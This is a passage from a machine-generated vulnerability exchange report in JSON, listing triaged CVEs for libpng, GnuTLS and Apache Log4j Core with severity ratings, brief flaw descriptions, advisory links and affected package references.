"urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-33636", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.6, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125, 787 ], "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng's ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue.", "recommendation": "Upgrade libpng to version 2:1.6.37-12.el9_7.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33636" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9693" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33636" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451805" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451819" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455897" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455901" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455908" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33416" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33636" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5731" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5732" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5734" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:8459" }, { "url": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869" }, { "url": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3" }, { "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2" }, { "url": "https://linux.oracle.com/cve/CVE-2026-33636.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33636" }, { "url": "https://ubuntu.com/security/notices/USN-8251-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33636" } ], "published": "2026-03-26T17:16:41+00:00", "updated": "2026-04-02T18:42:02+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-33845", "ratings": [ { "source": { "name": "nvd" }, "score": 9.1, "severity": "critical", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 191 ], "description": "A flaw in GnuTLS DTLS handshake parsing allows malformed fragments with zero length and non-zero offset, leading to an integer underflow during reassembly and resulting in an out-of-bounds read. This issue is remotely exploitable and may cause information disclosure or denial of service.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33845" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13274" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33845" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33845" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33845" } ], "published": "2026-04-30T18:16:28+00:00", "updated": "2026-05-05T03:03:19+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-33846", "ratings": [ { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 130 ], "description": "A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33846" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13274" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33846" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33846" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33846" } ], "published": "2026-05-04T10:15:59+00:00", "updated": "2026-05-04T15:22:52+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-34477", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 6.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" } ], "cwes": [ 297, 295 ], "description": "The fix for CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName attribute of the element.\n\nAlthough the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.\n\nA network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:\n\n * An SMTP, Socket, or Syslog appender is in use.\n * TLS is configured via a nested element.\n * The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.\nThis issue does not affect users of the HTTP appender, which uses a separate verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName attribute that was not subject to this bug and verifies host names by default.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.", "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34477" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34477" }, { "url": "https://github.com/apache/logging-log4j2" }, { "url": "https://github.com/apache/logging-log4j2/pull/4075" }, { "url": "https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4" }, { "url": "https://logging.apache.org/cyclonedx/vdr.xml" }, { "url": "https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName" }, { "url": "https://logging.apache.org/security.html#CVE-2026-34477" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34477" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34477" } ], "published": "2026-04-10T16:16:30+00:00", "updated": "2026-05-06T16:49:51+00:00", "affects": [ { "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f" }, { "ref": "urn:cdx:34e5c353-2a48-4fe2-805f-8f192280376d/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:ba2db0a6-0fda-4646-81f2-1b48896717af/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#877d9d1d-fc8f-4f9a-b205-469c5e476b2f" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#100d6984-23b7-456d-909e-92d446e27215" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#14e63e16-df36-4967-b7bd-97a9e0390547" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#10bcd395-25b6-42df-b273-867e13af25a6" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#1bf7fbab-1eef-4ecc-9894-2bc1acca0d53" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#1536cbff-3e84-4de1-b397-a7aeacdb5acb" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#60ddf8ad-1ef4-4cee-b11e-358cec665628" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#1c094c38-b147-4b75-9289-76a63854c096" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#98e964de-92a5-4e0c-8f37-b9c17abe105b" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#97ccea6a-0b52-4fec-85e6-3243f3bc4d50" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#74f558d6-4ba0-4638-8162-7601ddca836b" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#11208862-2643-4e52-9c00-cec8b793226d" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#12856278-bcf7-4546-b5a0-f3dafe12482a" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-34478", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], "cwes": [ 117, 684 ], "description": "Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes.\n\nTwo distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly:\n\n * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output.\n * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping.\n\n\nUsers of the SyslogAppender are not affected, as its configuration attributes were not modified.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.", "recommendation": "Upgrade org.apache.logging.log4j:log4j-core to version 2.25.4", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-34478" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/10/7" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-34478" }, { "url": "https://github.com/apache/logging-log4j2" }, { "url": "https://github.com/apache/logging-log4j2/pull/4074" }, { "url": "https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt" }, { "url": "https://logging.apache.org/cyclonedx/vdr.xml" }, { "url": "https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout" }, { "url": "https://logging.apache.org/security.html#CVE-2026-34478" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34478" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-34478" } ], "published": "2026-04-10T16:16:31+00:00", "updated": "2026-04-24T18:10:57+00:00", "affects": [ { "ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3", "versions": [ { "version": "2.25.3", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#2dfaebb4-9f04-4dd0-b2fb-defc1c1f105e" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#1cca19b0-a551-47f4-9f36-4719edf318a9" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:b5054fdf-8701-40fa-bada-ab5917185205/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:1e59dc1b-6b11-4d3e-80e8-4b1d3b1a2992/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-core@2.25.3" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#3d43a983-2b98-4c6a-872f-d8b5546c19ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#081fb987-b17a-46d9-909c-c15f0f57e16f" }, { "ref": 